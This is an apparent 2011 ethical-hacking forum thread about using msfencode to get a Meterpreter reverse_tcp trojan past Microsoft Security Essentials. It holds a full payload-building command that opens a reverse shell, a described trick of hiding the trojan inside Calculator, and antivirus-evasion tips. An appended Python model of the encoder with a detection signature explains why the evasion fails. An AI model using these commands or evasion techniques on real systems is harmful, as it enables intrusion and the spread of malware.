
msfencode


acidicloop

Newbie

Posts: 7

Joined: Tue Nov 29, 2011 12:40 am

Post Tue Nov 29, 2011 1:39 am

msfencode

Hello again. I've been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell; however, for the life of me I cannot get it past Microsoft Security Essentials antivirus. No matter what I do, it flags it. My code is this:

    msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe

I usually run an Apache server and connect to it from the XP machine and download the trojan, or I do shared folders in VM. Any tricks y'all know to bypass Security Essentials? I would think two counts of 10 apiece and shikata_ga_nai would do the trick, but alas it does not.

j0rDy


Hero Member

Posts: 591

Joined: Tue Feb 23, 2010 4:55 am

Location: Netherlands

Post Tue Nov 29, 2011 7:59 am

Re: msfencode

Pff, this is not easy. I'd say you have two options. Now please correct me if I'm wrong, I have no experience with this whatsoever!

The first thing you could do to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. You can use the following parameter for this:

    -b  The list of characters to avoid: '\x00\xff'

Another option would be to obfuscate the code or to attach the code to another executable, but I don't have any examples on that.

You have probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
CISSP, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net

Triban


Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Tue Nov 29, 2011 8:25 am

Re: msfencode

I've noticed that MSE is pretty darn good at catching these customized trojans. I had it catch the PDF exploit for CoolType almost instantly. I've also had it pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG). I have no idea why people would be upset with a company who designed an OS using their own built-in AV. One would think nobody would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.
Certs: GCWN
(@)Dewser

chrisg

Post Tue Nov 29, 2011 9:13 am

Re: msfencode


cd1zz


Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Tue Nov 29, 2011 10:01 am

Re: msfencode


acidicloop

Newbie

Posts: 7

Joined: Tue Nov 29, 2011 12:40 am

Post Tue Nov 29, 2011 10:57 am

Re: msfencode

Thanks for the links. Glad to know it's not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? Curious why that wouldn't evade SE, unless, like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self-extracting executable by attaching it to Calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too, and under the properties of the trojaned calc it's even signed by Microsoft, lol.
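The question left open in this thread (why a "polymorphic" encoder such as shikata_ga_nai still gets flagged after ten passes of -c, and why j0rDy's -b suggestion changes bytes without changing the verdict) is easiest to see in code. The Python below is an added example written for this page, not Metasploit's code. It models an additive-feedback XOR encoder with a hand-assembled x86 decoder stub laid out like shikata_ga_nai's; the opcode bytes are genuine x86 encodings, but the key schedule, the fixed fldz, the 0x1a displacement and the helper names (encode_layer, find_key_avoiding, build_stub, matches_stub_signature) are simplifying assumptions of this model, and the stub is never executed. The sample payload is a constructed byte string, not shellcode. The encoded body changes with every key, and a key can be drawn to avoid bad characters the way -b does, but the opcode skeleton of the decoder, including the outermost stub after any number of passes, stays constant, which is exactly what a wildcard template signature keys on.

```python
"""Model of a polymorphic XOR encoder and a wildcard signature over its decoder stub.
Added example for this thread, not Metasploit's own code: a simplified additive-feedback
key schedule and a hand-assembled stub mirroring the shikata_ga_nai layout (assumption)."""
import random
import re
import struct

STUB_LEN = 26     # length of the hand-assembled stub built below
MAX_DWORDS = 128  # 'sub ecx, -count' carries the count as a sign-extended imm8


def encode_body(payload, key):
    """XOR each dword with the running key, then advance the key by the plaintext dword."""
    padded = payload + b"\x90" * (-len(payload) % 4)  # NOP-pad to a dword boundary
    out = bytearray()
    for off in range(0, len(padded), 4):
        plain = struct.unpack_from("<I", padded, off)[0]
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out)


def decode_body(encoded, key):
    """Inverse of encode_body (what the stub does at run time); a partial tail is left as is."""
    out, full = bytearray(), len(encoded) // 4 * 4
    for off in range(0, full, 4):
        plain = struct.unpack_from("<I", encoded, off)[0] ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & 0xFFFFFFFF
    return bytes(out) + encoded[full:]


def build_stub(key, dwords, disp=0x1A):
    """x86 decoder loop; real opcode encodings, but disp is a placeholder (assumption)."""
    if not 1 <= dwords <= MAX_DWORDS:
        raise ValueError("dword count must fit a sign-extended imm8")
    return (
        b"\xd9\xee"                                 # fldz  (any FPU op, so fnstenv records an EIP)
        + b"\xd9\x74\x24\xf4"                       # fnstenv [esp-0xc]
        + b"\x5e"                                   # pop esi          ; esi = saved EIP
        + b"\xb8" + struct.pack("<I", key)          # mov eax, key     ; the part that varies per encode
        + b"\x83\xe9" + struct.pack("<b", -dwords)  # sub ecx, -count  ; negative count dodges null bytes
        + b"\x31\x46" + bytes([disp])               # xor [esi+disp], eax
        + b"\x03\x46" + bytes([disp])               # add eax, [esi+disp]
        + b"\x83\xee\xfc"                           # sub esi, -4
        + b"\xe2\xf5"                               # loop back to the xor
    )


def encode_layer(payload, key):
    body = encode_body(payload, key)
    return build_stub(key, len(body) // 4) + body


def decode_layer(artifact):
    """Read the key out of 'mov eax, key' and undo one layer of encoding."""
    key = struct.unpack_from("<I", artifact, 8)[0]
    return decode_body(artifact[STUB_LEN:], key)


def encode_iterations(payload, keys):
    """Like 'msfencode -c N': each pass wraps the previous stub+body in a fresh stub."""
    for key in keys:
        payload = encode_layer(payload, key)
    return payload


def find_key_avoiding(payload, badchars, tries=100000, seed=0):
    """Like 'msfencode -b': draw keys until stub and body contain none of the bad bytes."""
    bad, rng = set(badchars), random.Random(seed)
    for _ in range(tries):
        key = rng.getrandbits(32)
        artifact = encode_layer(payload, key)
        if not bad & set(artifact):
            return key, artifact
    raise ValueError("no key avoids the given characters")


# Wildcard signature of the kind an AV engine can use: '.' stands in for the key, count
# and displacement bytes that change on every encode; the opcode skeleton does not.
STUB_SIGNATURE = re.compile(
    rb"\xd9\x74\x24\xf4\x5e\xb8....\x83\xe9.\x31\x46.\x03\x46.\x83\xee\xfc\xe2.", re.DOTALL
)


def matches_stub_signature(blob):
    return STUB_SIGNATURE.search(blob) is not None


if __name__ == "__main__":
    PAYLOAD = b"constructed placeholder body, not shellcode\x00"  # constructed sample input
    a, b = encode_layer(PAYLOAD, 0x11223344), encode_layer(PAYLOAD, 0x55667788)
    print("encoded bodies differ:", a[STUB_LEN:] != b[STUB_LEN:])
    print("signature hits both:", matches_stub_signature(a) and matches_stub_signature(b))
    key, clean = find_key_avoiding(PAYLOAD, b"\x00\xff")
    print("key %#010x avoids \\x00\\xff, still flagged: %s" % (key, matches_stub_signature(clean)))
    ten = encode_iterations(PAYLOAD, range(0x1000, 0x100A))
    print("after 10 passes the outer stub is still flagged:", matches_stub_signature(ten))
```

Run it directly and every check prints True: the bodies differ per key, the -b style search finds a key with no 0x00 or 0xff anywhere in the artifact, and ten nested passes leave the same stub skeleton on the outside. That is the template effect acidicloop describes: re-keying and re-iterating the same encoder change the wildcarded bytes only, so a signature written over the opcode skeleton keeps matching. The model ignores the other thing real engines do, which is emulate the sample and look at what the decoder produces, so even a hand-rewritten stub is no guarantee on its own.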
